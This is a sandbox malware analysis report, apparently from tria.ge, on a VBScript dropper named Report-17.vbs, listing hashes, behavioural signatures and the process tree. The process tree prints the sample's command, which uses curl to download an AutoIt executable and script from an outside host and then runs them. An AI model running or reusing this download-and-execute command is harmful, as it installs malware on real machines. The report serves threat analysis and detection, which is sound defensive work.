Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
142s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
10/10/2023, 15:46
Static task
static1
Behavioral task
behavioral1
Sample
Report-17.txt
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
Report-17.txt
Resource
win10v2004-20230915-en
Behavioral task
behavioral3
Sample
Report-17.vbs
Resource
win7-20230831-en
Behavioral task
behavioral4
Sample
Report-17.vbs
Resource
win10v2004-20230915-en
General
-
Target
Report-17.vbs
-
Size
16KB
-
MD5
902d4e9234583e12da2d0078d37f5a30
-
SHA1
7ced5e82455bc1afc788ebf13170f76a219edea2
-
SHA256
5c084328ab45eb579d31c3157b0f486cbfea6ca0dfd89dda2084ace5745b9549
-
SHA512
8a0e61e9d3110de4aa10c63b60dd0ace4b3725915c3e20d225986f94c30bd4fe181e94bb21d2771c458b256bdea2028a24f4d6e56c012d46da6032175810c1da
-
SSDEEP
384:SzE0ig4KR/aQsKsWMnkf+cTPgKekvj27vmJYs:AJHsXkfNEKekvq7eJz
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 3716 WScript.exe 7 3716 WScript.exe 9 3716 WScript.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
pid Process 1568 Autoit3.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Autoit3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Autoit3.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeManageVolumePrivilege 420 svchost.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 3716 wrote to memory of 3496 3716 WScript.exe 83 PID 3716 wrote to memory of 3496 3716 WScript.exe 83 PID 3496 wrote to memory of 3808 3496 cmd.exe 85 PID 3496 wrote to memory of 3808 3496 cmd.exe 85 PID 3496 wrote to memory of 4352 3496 cmd.exe 88 PID 3496 wrote to memory of 4352 3496 cmd.exe 88 PID 3496 wrote to memory of 1568 3496 cmd.exe 89 PID 3496 wrote to memory of 1568 3496 cmd.exe 89 PID 3496 wrote to memory of 1568 3496 cmd.exe 89
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Report-17.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3716 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c cd /d %temp% & curl -o Autoit3.exe http://prestige-castom.com:2351 & curl -o ymehvz.au3 http://prestige-castom.com:2351/msirzgnzamg & Autoit3.exe ymehvz.au32⤵
- Suspicious use of WriteProcessMemory
PID:3496 -
C:\Windows\system32\curl.execurl -o Autoit3.exe http://prestige-castom.com:23513⤵PID:3808
-
-
C:\Windows\system32\curl.execurl -o ymehvz.au3 http://prestige-castom.com:2351/msirzgnzamg3⤵PID:4352
-
-
C:\Users\Admin\AppData\Local\Temp\Autoit3.exeAutoit3.exe ymehvz.au33⤵
- Executes dropped EXE
- Checks processor information in registry
PID:1568
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe1⤵PID:3680
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵
- Suspicious use of AdjustPrivilegeToken
PID:420
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
872KB
MD5c56b5f0201a3b3de53e561fe76912bfd
SHA12a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c
-
Filesize
102KB
MD5151711041ee1619088258f05a5d3bd5b
SHA1d2047aaf530ce0db076ea7cc7e548fd5a35cee55
SHA256ead5d943a69f2d8641612415c77ad26daa6d53e1c6ea0270a91d3121eafd943d
SHA5121085c381dc8f97353bed29e96a10a2e8ba4a6df761c2af56f9cced5cc6b49c80c388e280a2d53b09e20b4e19f1bdcc813d687d52f7f31679f6ee1c84c23037a1
-
Filesize
388KB
MD51ddcfa52d781f75190c18c48e9645b63
SHA1e2976a957580fde87caa6dd615e01a574292b564
SHA2561f77719d1f2ffee980d89e74904859e7d098ac1f7d1d09a0e406b1a4a1f8e23c
SHA5127882772319b3a801b72ebfad7674c35f43261f9f7aa0b163e49da0d898090ca1380db5b209b6263889a1180c68bd75ac6d53fb0fbaeebfca96f167f51a607afb